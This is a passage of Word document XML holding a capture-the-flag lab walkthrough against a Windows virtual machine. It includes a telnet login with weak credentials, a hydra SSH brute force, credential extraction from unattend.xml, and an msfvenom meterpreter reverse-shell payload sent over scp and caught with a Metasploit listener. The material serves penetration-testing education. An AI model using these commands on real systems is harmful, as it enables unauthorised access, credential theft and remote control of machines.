      </w:r>
      <w:r>
        <w:t xml:space="preserve"> one doesn’t contain much useful </w:t>
      </w:r>
      <w:r w:rsidR="00E847C9">
        <w:t>info,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> but the 3</w:t>
      </w:r>
      <w:r w:rsidRPr="00641B0C">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>rd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E847C9">
        <w:t>one is what we want.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AC2678" w14:textId="3B18D005" w:rsidR="00E847C9" w:rsidRDefault="00E847C9" w:rsidP="00543BB1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CFA9BC1" wp14:editId="66F9B55F">
            <wp:extent cx="5936615" cy="245681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456815"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="066A1D1F" w14:textId="6032D045" w:rsidR="00E847C9" w:rsidRDefault="00E847C9" w:rsidP="00543BB1">
      <w:r>
        <w:t>WOW we have enumerated a user that is suspected to have a weak password. Let’s save this information for later and for now we will try and login to telnet with the user: hahaha and password: haha.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254024BC" w14:textId="5DC53E13" w:rsidR="00E847C9" w:rsidRPr="00E847C9" w:rsidRDefault="00E847C9" w:rsidP="00543BB1">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E847C9">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>telnet 10.0.2.12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EB3644" w14:textId="46252F41" w:rsidR="00E847C9" w:rsidRPr="00E847C9" w:rsidRDefault="00E847C9" w:rsidP="00543BB1">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E847C9">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>hahaha</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B929866" w14:textId="3FE3F5F2" w:rsidR="00E847C9" w:rsidRPr="00E847C9" w:rsidRDefault="00E847C9" w:rsidP="00543BB1">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E847C9">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>haha</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275F085A" w14:textId="7600F0BD" w:rsidR="00E847C9" w:rsidRPr="00E847C9" w:rsidRDefault="00E847C9" w:rsidP="00543BB1">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E847C9">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2085F0" w14:textId="77A171FF" w:rsidR="00E847C9" w:rsidRDefault="00E847C9" w:rsidP="00543BB1">
      <w:r w:rsidRPr="00E847C9">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>type bonusflag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F1271C" w14:textId="3EBA42F1" w:rsidR="00E847C9" w:rsidRDefault="00E847C9" w:rsidP="00543BB1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B70757D" wp14:editId="19CBE91A">
            <wp:extent cx="4981575" cy="22110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2211070"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA310F4" w14:textId="3563040E" w:rsidR="00641B0C" w:rsidRDefault="00E847C9" w:rsidP="00543BB1">
      <w:r w:rsidRPr="00E847C9">
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>BONUS FLAG CAPTURED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329F6A86" w14:textId="25BA6245" w:rsidR="00E847C9" w:rsidRDefault="00E847C9" w:rsidP="00543BB1">
      <w:r>
        <w:t>Time to leave this outdated telnet experience. It’s too slow and laggy with no real modern functionality. Gross.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E70517A" w14:textId="4D53209B" w:rsidR="00E847C9" w:rsidRDefault="00E847C9" w:rsidP="00543BB1">
      <w:r>
        <w:t>Now let’s attempt a ssh login with the username: richmond</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EB498F" w14:textId="68540872" w:rsidR="000C35CA" w:rsidRDefault="00E847C9" w:rsidP="00543BB1">
      <w:r>
        <w:t>But first we knew that were going to have to brute force the password. Using hydra and specifying the service we can</w:t>
      </w:r>
      <w:r w:rsidR="000C35CA">
        <w:t xml:space="preserve"> (fingers crossed) gain access. Use any wordlist you like although I prefer “rockyou.txt”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9D7A81" w14:textId="054FB9CA" w:rsidR="000C35CA" w:rsidRDefault="000C35CA" w:rsidP="00543BB1">
      <w:r w:rsidRPr="000C35CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>hydra -l richmond -P /usr/share/wordlists/rockyou.txt 10.0.2.12 ssh -t4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE15CE4" w14:textId="4A532562" w:rsidR="00E847C9" w:rsidRDefault="000C35CA" w:rsidP="00543BB1">
      <w:r>
        <w:t>The password returned is “password”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CDFCFC" w14:textId="5CEDF9B7" w:rsidR="000C35CA" w:rsidRPr="00EF430B" w:rsidRDefault="00A75B5E" w:rsidP="00543BB1">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF430B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>*****</w:t>
      </w:r>
      <w:r w:rsidR="000C35CA" w:rsidRPr="00EF430B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>WHERE IS THE GOOD PASSWOR HYGEINE!? We could have guessed that instead of going to all the trouble to brute force it. Oh well. Moving on no</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF430B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>w****</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C63A939" w14:textId="1C727063" w:rsidR="000C35CA" w:rsidRDefault="000C35CA" w:rsidP="00543BB1">
      <w:r>
        <w:t>Login to ssh with the obtained credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4E437B" w14:textId="25991898" w:rsidR="000C35CA" w:rsidRDefault="000C35CA" w:rsidP="00543BB1">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C35CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>ssh richmond@10.0.2.12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDB3D84" w14:textId="27564843" w:rsidR="000C35CA" w:rsidRPr="000C35CA" w:rsidRDefault="000C35CA" w:rsidP="00543BB1">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C35CA">
        <w:t>If you are prompted to continue enter</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="000C35CA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E21C2E9" w14:textId="0690551D" w:rsidR="000C35CA" w:rsidRDefault="000C35CA" w:rsidP="00543BB1">
      <w:r w:rsidRPr="000C35CA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1D3EA9" w14:textId="3C8A24DD" w:rsidR="000C35CA" w:rsidRDefault="000C35CA" w:rsidP="00543BB1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="682D4931" wp14:editId="2807403D">
            <wp:extent cx="594360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14:paraId="1AB50A07" w14:textId="3091B7A6" w:rsidR="000C35CA" w:rsidRDefault="000C35CA" w:rsidP="00543BB1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Let’s poke around and see what we can find.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAC245D" w14:textId="5641F7FE" w:rsidR="00A75B5E" w:rsidRPr="00D0043A" w:rsidRDefault="00A75B5E" w:rsidP="00543BB1">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D0043A">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD3B286" w14:textId="4C9467D7" w:rsidR="00A75B5E" w:rsidRPr="00D0043A" w:rsidRDefault="00A75B5E" w:rsidP="00543BB1">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D0043A">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>cd ..\..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746086FB" w14:textId="3057C276" w:rsidR="00A75B5E" w:rsidRPr="00D0043A" w:rsidRDefault="00A75B5E" w:rsidP="00543BB1">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D0043A">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>cd windows\Panther</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5742A87B" w14:textId="48703677" w:rsidR="00A75B5E" w:rsidRDefault="00A75B5E" w:rsidP="00543BB1">
      <w:r w:rsidRPr="00D0043A">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>type unattend.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E64581" w14:textId="4FCA7CC6" w:rsidR="000371E0" w:rsidRDefault="000371E0" w:rsidP="00543BB1">
      <w:r>
        <w:t xml:space="preserve">We’ve found some credentials for IEUser which is known to be a high-privilege user. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D637E42" w14:textId="07E4A0A6" w:rsidR="000371E0" w:rsidRDefault="000371E0" w:rsidP="00543BB1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="463C22C1" wp14:editId="6B40334F">
            <wp:extent cx="3200400" cy="941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941705"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFBCD33" w14:textId="2B9C1BD9" w:rsidR="000C35CA" w:rsidRDefault="000371E0" w:rsidP="00543BB1">
      <w:r>
        <w:t>Now the Password looks familiar. The equals sign at the end of the string is padding for base64 encoding. Decode it using CyberChef. Resulting in “qwerty12345”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5A1B86" w14:textId="4069D908" w:rsidR="000371E0" w:rsidRDefault="004C772B" w:rsidP="00543BB1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="37B7F11B" wp14:editId="481F2726">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2238233</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>938</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1037230" cy="777923"/>
                <wp:effectExtent l="0" t="0" r="10795" b="22225"/>
                <wp:wrapNone/>
                <wp:docPr id="30" name="Oval 30"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1037230" cy="777923"/>
                        </a:xfrm>
                        <a:prstGeom prst="ellipse">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2D07A4" id="Oval 30" o:spid="_x0000_s1026" style="position:absolute;margin-left:176.25pt;margin-top:.05pt;width:81.65pt;height:6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" filled="f" strokecolor="#002060"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835A7B7" wp14:editId="22D4CD2D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2238233</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2594013</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="914400" cy="696036"/>
                <wp:effectExtent l="0" t="0" r="19050" b="27940"/>
                <wp:wrapNone/>
                <wp:docPr id="29" name="Oval 29"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="914400" cy="696036"/>
                        </a:xfrm>
                        <a:prstGeom prst="ellipse">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B64A3" id="Oval 29" o:spid="_x0000_s1026" style="position:absolute;margin-left:176.25pt;margin-top:204.25pt;width:1in;height:5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" filled="f" strokecolor="#002060" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
              </v:oval>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="000371E0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10875BA0" wp14:editId="6CAF1568">
            <wp:extent cx="3200400" cy="310500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0926" cy="3115216"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4622DDCA" w14:textId="77777777" w:rsidR="000371E0" w:rsidRDefault="000371E0" w:rsidP="00543BB1"/>
    <w:p w14:paraId="58105CEC" w14:textId="38243F94" w:rsidR="000371E0" w:rsidRDefault="00137EE2" w:rsidP="00543BB1">
      <w:r>
        <w:t>I have a feeling these credentials being accessible is too good to be true. I doubt we could use it to login to any service.</w:t>
      </w:r>
      <w:r w:rsidR="000371E0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>For now, we’ll c</w:t>
      </w:r>
      <w:r w:rsidR="000371E0">
        <w:t>ontinue poking around in the ssh connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8D5D4B" w14:textId="0E484558" w:rsidR="000371E0" w:rsidRPr="00137EE2" w:rsidRDefault="00137EE2" w:rsidP="00543BB1">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00137EE2">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>cd Users\richmond</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BCA293" w14:textId="7A6BEE44" w:rsidR="00137EE2" w:rsidRDefault="00137EE2" w:rsidP="00543BB1">
      <w:r w:rsidRPr="00137EE2">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>type noteToRichmond.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A09FDD" w14:textId="7354ADF1" w:rsidR="00137EE2" w:rsidRDefault="00137EE2" w:rsidP="00543BB1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54E1259F" wp14:editId="01995C2D">
            <wp:extent cx="5943600" cy="314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0DE17FFA" w14:textId="6E153ED8" w:rsidR="00A07AAA" w:rsidRDefault="00137EE2" w:rsidP="00543BB1">
      <w:r>
        <w:t>Major hints for obtaining flags. This is good information. Time to dive into the rabbit hole further.</w:t>
      </w:r>
      <w:r w:rsidR="007A65E3">
        <w:t xml:space="preserve"> Let’s follow the instructions and craft a msfvenom payload to then deliver it to the victim machine using scp. A service that utilizes ssh (which we already have a login for).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A32B9A" w14:textId="4EFBDB7B" w:rsidR="007A65E3" w:rsidRPr="00A07AAA" w:rsidRDefault="007A65E3" w:rsidP="00543BB1">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A07AAA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.0.2.6 LPORT=4445 -f exe &gt; shella2.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFB7813" w14:textId="5FACC918" w:rsidR="007A65E3" w:rsidRDefault="00A07AAA" w:rsidP="00543BB1">
      <w:r w:rsidRPr="00A07AAA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">scp shella2.exe </w:t>
      </w:r>
      <w:r w:rsidR="00F15F0A" w:rsidRPr="00F15F0A">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>richmond@10.0.2.12</w:t>
      </w:r>
      <w:r w:rsidRPr="00A07AAA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02030A2B" w14:textId="4BE6FDE5" w:rsidR="00F15F0A" w:rsidRDefault="00F15F0A" w:rsidP="00543BB1">
      <w:r w:rsidRPr="00F15F0A">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52508F7C" w14:textId="64E56644" w:rsidR="00A07AAA" w:rsidRDefault="00A07AAA" w:rsidP="00543BB1">
      <w:r>
        <w:t>Set up a listener within Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54622DDA" w14:textId="0EAD3978" w:rsidR="00A07AAA" w:rsidRPr="00A07AAA" w:rsidRDefault="00A07AAA" w:rsidP="00543BB1">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A07AAA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A7EF0E" w14:textId="75DAFA77" w:rsidR="00A07AAA" w:rsidRPr="00A07AAA" w:rsidRDefault="00A07AAA" w:rsidP="00543BB1">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A07AAA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>use multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4568C760" w14:textId="3E4D4EAA" w:rsidR="00A07AAA" w:rsidRPr="00A07AAA" w:rsidRDefault="00A07AAA" w:rsidP="00543BB1">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A07AAA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>set lport 4445</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7EF717" w14:textId="55F537E9" w:rsidR="00A07AAA" w:rsidRPr="00A07AAA" w:rsidRDefault="00A07AAA" w:rsidP="00543BB1">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A07AAA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>set lhosts 10.0.2.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDCE889" w14:textId="553A7385" w:rsidR="00A07AAA" w:rsidRDefault="00A07AAA" w:rsidP="00543BB1">
      <w:r w:rsidRPr="00A07AAA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>set payload windows/meterpreter_reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6E99DF" w14:textId="01089420" w:rsidR="00A07AAA" w:rsidRDefault="00A07AAA" w:rsidP="00543BB1">
      <w:r w:rsidRPr="00A07AAA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33928630" w14:textId="2F1A1786" w:rsidR="00A07AAA" w:rsidRDefault="00A07AAA" w:rsidP="00543BB1">
      <w:bookmarkStart w:id="0" w:name="_Hlk124611113"/>
      <w:r>
        <w:t>Go back to the ssh connection via richmond. If it closed restart it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1705453E" w14:textId="7EE06059" w:rsidR="00A07AAA" w:rsidRPr="00A07AAA" w:rsidRDefault="00A07AAA" w:rsidP="00543BB1">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A07AAA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>ssh richmond@10.0.2.12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9A87A4" w14:textId="0B1A4BCC" w:rsidR="00A07AAA" w:rsidRDefault="00A07AAA" w:rsidP="00543BB1">
      <w:r w:rsidRPr="00A07AAA">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w14:paraId="7BFE1DDA" w14:textId="2F8FF1C6" w:rsidR="00D94865" w:rsidRDefault="00D94865" w:rsidP="00543BB1">
      <w:r>
        <w:t>Otherwise simply execute the payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D863CF6" w14:textId="1BC455CD" w:rsidR="00D94865" w:rsidRDefault="00D94865" w:rsidP="00543BB1">
      <w:r w:rsidRPr="00D94865">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>shella2.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4E5E0A" w14:textId="754D5F69" w:rsidR="00D94865" w:rsidRDefault="00D94865" w:rsidP="00543BB1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Go back to your listener and see that you have captured a reverse shell!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E641C34" w14:textId="1F4EBD17" w:rsidR="00D94865" w:rsidRDefault="00D94865" w:rsidP="00543BB1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43D4FD86" wp14:editId="48E5E9B1">
            <wp:extent cx="594360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2AB8EA2F" w14:textId="6A5C9A4B" w:rsidR="00D94865" w:rsidRDefault="00D94865" w:rsidP="00543BB1">
      <w:r w:rsidRPr="00D94865">
        <w:rPr>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>RED FLAG CAPTURED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68328B39" w14:textId="77777777" w:rsidR="007278E3" w:rsidRDefault="007278E3" w:rsidP="00543BB1"/>
    <w:p w14:paraId="7820B495" w14:textId="77777777" w:rsidR="007278E3" w:rsidRDefault="007278E3" w:rsidP="00543BB1"/>
    <w:p w14:paraId="7D98276D" w14:textId="7613FEBE" w:rsidR="00D94865" w:rsidRDefault="00D51AF5" w:rsidP="00543BB1">
      <w:r>
        <w:t>Moving on towards the Black Flag, background the current meterpreter session and remember the session ID that is assigned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BE333C" w14:textId="73273378" w:rsidR="00D51AF5" w:rsidRDefault="00D51AF5" w:rsidP="00543BB1">
      <w:r w:rsidRPr="00D51AF5">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67762547" w14:textId="04809C0D" w:rsidR="007278E3" w:rsidRDefault="00D51AF5" w:rsidP="00543BB1">
      <w:r>
        <w:t>There are 2 ways to go about accomplishing the same task</w:t>
      </w:r>
      <w:r w:rsidR="007278E3">
        <w:t xml:space="preserve"> next</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Each method results in the same exploit being run at the end. The first is to search in the msfconsole and select the correct exploit. The other is to use a post exploit suggester module inside Metasploit to help you decide where to go next to escalate privileges. When using the suggester, it will show you multiple options. Many won’t work so you will have to try all the recommended ones. (I wish I would have figured this out sooner) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BEFB72" w14:textId="77777777" w:rsidR="007278E3" w:rsidRDefault="007278E3" w:rsidP="00543BB1"/>
    <w:p w14:paraId="725155D8" w14:textId="5168B465" w:rsidR="007278E3" w:rsidRDefault="004C772B" w:rsidP="00543BB1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="38DD7570" wp14:editId="0BF7FE1B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1252751</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1628064</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="610168" cy="50611"/>
                <wp:effectExtent l="0" t="57150" r="19050" b="45085"/>
                <wp:wrapNone/>
                <wp:docPr id="31" name="Straight Arrow Connector 31"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvCnPr/>
                      <wps:spPr>
                        <a:xfrm flipH="1" flipV="1">
                          <a:off x="0" y="0"/>
                          <a:ext cx="610168" cy="50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FAD16" id="_x0000_t32" coordsize="21600,21600" o:spt="32" o:oned="t" path="m,l21600,21600e" filled="f">
                <v:path arrowok="t" fillok="f" o:connecttype="none"/>
                <o:lock v:ext="edit" shapetype="t"/>
              </v:shapetype>
              <v:shape id="Straight Arrow Connector 31" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;margin-left:98.65pt;margin-top:128.2pt;width:48.05pt;height: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" strokecolor="red" strokeweight=".5pt">
                <v:stroke endarrow="block" joinstyle="miter"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="007278E3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FDD1507" wp14:editId="396C6F16">
            <wp:extent cx="5930265"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3705225"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
